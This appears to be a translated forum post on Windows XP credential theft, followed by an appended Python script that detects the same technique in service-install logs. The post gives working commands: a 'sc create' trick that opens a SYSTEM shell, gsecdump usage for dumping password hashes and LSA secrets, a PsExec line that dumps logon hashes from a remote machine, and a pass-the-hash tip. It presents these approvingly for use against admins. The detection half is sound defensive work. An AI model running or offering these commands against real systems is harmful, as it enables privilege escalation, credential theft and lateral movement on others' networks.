To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hashes just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes captured during ARP spoofing, and the ones obtained with gethash, don't actually need to be cracked at all; this is just about using the tool. As the original article puts it, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Frustrating, what a gap.
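From the defender's side, the service trick above leaves a clear trace: each `sc create` lands in the System log as a service-install event, and the `type= interact` switch shows up as the 0x100 bit in the recorded service type. The following detection script is an added example, not part of the original post or of any tool it mentions; the records are constructed here, with field names modelled on Windows event 7045, and the `assess`/`scan` functions and the flagged-name lists are this example's own.

```python
import re

# Constructed records modelled on Windows System-log event 7045
# ("A service was installed in the system"); the values are made up here.
SAMPLE_EVENTS = [
    "ServiceName=shellcmdline; ImagePath=C:\\WINDOWS\\system32\\cmd.exe /K start; "
    "ServiceType=0x110; StartType=demand start; Account=LocalSystem",
    "ServiceName=PSEXESVC; ImagePath=%SystemRoot%\\PSEXESVC.exe; "
    "ServiceType=0x10; StartType=demand start; Account=LocalSystem",
    "ServiceName=BackupAgent; ImagePath=\"C:\\Program Files\\Backup\\agent.exe\" -svc; "
    "ServiceType=0x10; StartType=auto start; Account=LocalSystem",
]

SHELLS = {"cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe"}
REMOTE_EXEC_SERVICES = {"psexesvc"}   # name of PsExec's temporary service
SERVICE_INTERACTIVE_PROCESS = 0x100   # the bit set by `sc create ... type= interact`

def parse_event(line):
    """Split a 'Key=Value; Key=Value' record into a dict."""
    return dict(part.split("=", 1) for part in line.split("; "))

def image_basename(image_path):
    """Lower-cased executable name from an ImagePath, ignoring arguments."""
    m = re.match(r'^"?(.*?\.exe)"?(?:\s|$)', image_path.strip(), re.IGNORECASE)
    return re.split(r"[\\/]", m.group(1))[-1].lower() if m else ""

def assess(event):
    """Return (service_name, verdict, reasons) for one parsed record."""
    name, exe = event["ServiceName"], image_basename(event["ImagePath"])
    svc_type = int(event["ServiceType"], 16)
    reasons = []
    if exe in SHELLS:
        reasons.append("command interpreter registered as the service binary")
    if svc_type & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("interactive service flag set")
    if name.lower() in REMOTE_EXEC_SERVICES:
        reasons.append("known remote-execution helper service")
    verdict = "high" if exe in SHELLS else ("medium" if reasons else "none")
    return name, verdict, reasons

def scan(lines):
    """Assess every record and keep only those with a finding."""
    results = [assess(parse_event(line)) for line in lines]
    return [r for r in results if r[1] != "none"]

if __name__ == "__main__":
    for name, verdict, reasons in scan(SAMPLE_EVENTS):
        print(f"{verdict:6} {name}: {'; '.join(reasons)}")
```

On XP-era hosts several stock services still carry the interactive flag, so that reason on its own is kept at medium rather than high.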